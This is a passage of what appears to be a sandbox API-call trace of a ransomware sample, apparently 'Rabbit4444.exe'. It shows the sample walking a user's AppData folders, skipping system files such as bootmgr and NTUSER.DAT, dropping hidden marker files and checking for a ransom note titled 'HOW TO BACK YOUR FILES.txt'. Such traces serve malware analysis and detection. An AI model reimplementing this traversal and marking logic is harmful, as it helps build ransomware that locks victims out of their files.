(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.409] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.409] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.409] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.409] CloseHandle (hObject=0x2cc) returned 1 [0065.409] CloseHandle (hObject=0x2a0) returned 1 [0065.409] GetCurrentThreadId () returned 0xd98 [0065.409] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0065.409] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC" [0065.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1245e8 | out: hHeap=0xe0000) returned 1 [0065.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0065.409] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC" [0065.409] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\" [0065.409] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0065.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.412] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.415] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.415] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.416] CloseHandle (hObject=0x2a0) returned 1 [0065.416] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC") returned 85 [0065.416] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04fc5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0065.416] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.416] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.416] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.416] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.416] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04fc5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.417] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.417] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.417] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.417] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.417] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.417] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04fc5de, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04fc5de, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04fc5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.417] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.417] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.417] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0065.417] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0065.417] lstrcpyW (in: lpString1=0x130ebe4, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0065.417] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0065.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0065.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0xefb28 [0065.418] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x11cfe8 [0065.418] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0065.418] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0065.418] lstrcpyW (in: lpString1=0x130ebe4, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0065.419] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0065.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0065.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116520 [0065.419] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122148 [0065.419] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0065.419] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0065.419] lstrcpyW (in: lpString1=0x130ebe4, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0065.419] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0065.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0065.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116ba0 [0065.419] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122008 [0065.420] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0065.420] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0065.420] lstrcpyW (in: lpString1=0x130ebe4, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0065.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0065.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x1235c0 [0065.420] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122108 [0065.420] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0065.420] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0065.420] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.420] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.421] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.421] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.421] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.422] CloseHandle (hObject=0x2cc) returned 1 [0065.422] CloseHandle (hObject=0x2a0) returned 1 [0065.422] GetCurrentThreadId () returned 0xd98 [0065.422] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0065.422] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp" [0065.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1235c0 | out: hHeap=0xe0000) returned 1 [0065.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0065.422] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp" [0065.422] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\" [0065.422] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0065.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.423] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.426] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.427] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.427] CloseHandle (hObject=0x2a0) returned 1 [0065.427] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp") returned 90 [0065.427] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.427] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0065.427] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.427] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.427] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.427] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.427] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.428] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.428] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.428] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.428] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.428] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.428] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0522902, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0522902, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.428] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.428] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.428] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0522902, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0522902, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.428] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0065.428] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.428] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.428] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.429] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.429] CloseHandle (hObject=0x2cc) returned 1 [0065.429] CloseHandle (hObject=0x2a0) returned 1 [0065.429] GetCurrentThreadId () returned 0xd98 [0065.429] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0065.429] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory" [0065.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ba0 | out: hHeap=0xe0000) returned 1 [0065.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0065.429] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory" [0065.429] lstrcatW (in: 